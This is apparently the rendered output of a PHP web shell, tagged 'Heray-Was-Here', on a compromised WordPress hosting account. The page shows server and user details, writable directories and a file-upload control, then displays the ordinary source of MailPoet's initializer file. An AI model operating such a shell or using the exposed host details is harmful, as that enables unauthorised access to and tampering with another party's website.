Heray-Was-Here
Server : Apache
System : Linux binac.nextwavehosting.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
User : homes21 ( 1062)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/homes21/public_html/wp-content/plugins/mailpoet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/homes21/public_html/wp-content/plugins/mailpoet/mailpoet_initializer.php
<?php // phpcs:ignore SlevomatCodingStandard.TypeHints.DeclareStrictTypes.DeclareStrictTypesMissing

if (!defined('ABSPATH')) exit;


use Automattic\WooCommerce\EmailEditor\Email_Editor_Container;
use MailPoet\Config\Env;
use MailPoet\Config\RequirementsChecker;
use Tracy\Debugger;

if (empty($mailpoetPlugin)) exit;

require_once($mailpoetPlugin['autoloader']);

if (PHP_VERSION_ID >= 80200) {
  $tracyPath = __DIR__ . '/tools/vendor/tracy.phar';
} else {
  $tracyPath = __DIR__ . '/tools/vendor/tracy-legacy.phar';
}
if (WP_DEBUG && PHP_VERSION_ID >= 70100 && file_exists($tracyPath)) {
  require_once $tracyPath;

  if (getenv('MAILPOET_TRACY_PRODUCTION_MODE')) {
    $logDir = getenv('MAILPOET_TRACY_LOG_DIR');
    if (!$logDir) {
      throw new RuntimeException("Environment variable 'MAILPOET_TRACY_LOG_DIR' was not set.");
    }

    if (!is_dir($logDir)) {
      @mkdir($logDir, 0777, true);
    }

    if (!is_writable($logDir)) {
      throw new RuntimeException("Logging directory '$logDir' is not writable.'");
    }

    Debugger::enable(Debugger::PRODUCTION, $logDir);
    Debugger::$logSeverity = E_ALL;
  } else {
    function render_tracy() {
      ob_start();
      Debugger::renderLoader();
      $tracyScriptHtml = ob_get_clean();

      // strip 'async' to ensure all AJAX request are caught
      // (even when fired immediately after page starts loading)
      // see: https://github.com/nette/tracy/issues/246
      $tracyScriptHtml = str_replace('async', '', $tracyScriptHtml);

      // set higher number of displayed AJAX rows
      $maxAjaxRows = 4;
      $tracyScriptHtml .= "<script>window.TracyMaxAjaxRows = $maxAjaxRows;</script>\n";

      // just minor adjustments to Debugger::renderLoader() output
      // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
      echo $tracyScriptHtml;
    }

    add_action('admin_enqueue_scripts', 'render_tracy', PHP_INT_MAX, 0);
    session_start();
    Debugger::enable(Debugger::DEVELOPMENT);

    // Fix Tracy info panel error: when Composer\Autoload\ClassLoader is loaded
    // from a plugin without autoload_psr4.php (e.g., Query Monitor), Tracy's
    // info panel fails with "Undefined variable $baseDir". Wrap the panel to
    // suppress this specific error.
    $bar = Debugger::getBar();
    $origInfoPanel = $bar->getPanel('Tracy:info');
    $bar->addPanel(new class($origInfoPanel) implements \Tracy\IBarPanel {
      private $inner;

      public function __construct(
        \Tracy\IBarPanel $inner
      ) {
        $this->inner = $inner;
      }

      public function getTab(): string {
        return $this->inner->getTab();
      }

      public function getPanel(): string {
        $prev = set_error_handler(function ($severity, $message, $file) use (&$prev) {
          if (strpos($message, 'Undefined variable') !== false && strpos($file, 'info.panel.phtml') !== false) {
            return true;
          }
          return $prev ? $prev($severity, $message, $file, func_get_arg(3)) : false;
        });
        try {
          return $this->inner->getPanel();
        } finally {
          restore_error_handler();
        }
      }
    }, 'Tracy:info');

    if (getenv('MAILPOET_DISABLE_TRACY_PANEL')) {
      Debugger::$showBar = false;
    }
  }
  define('MAILPOET_DEVELOPMENT', true);
}

define('MAILPOET_VERSION', $mailpoetPlugin['version']);

Env::init(
  $mailpoetPlugin['filename'],
  $mailpoetPlugin['version']
);

$requirements = new RequirementsChecker();
$requirementsCheckResults = $requirements->checkAllRequirements();
if (
  !$requirementsCheckResults[RequirementsChecker::TEST_VENDOR_SOURCE]
) {
  return;
}

// Ensure functions like get_plugins, etc.
require_once(ABSPATH . 'wp-admin/includes/plugin.php');

// Initialize the Email Editor container to allow getting its instances in MailPoet constructors.
Email_Editor_Container::init();

$initializer = MailPoet\DI\ContainerWrapper::getInstance()->get(MailPoet\Config\Initializer::class);
$initializer->init();

Hry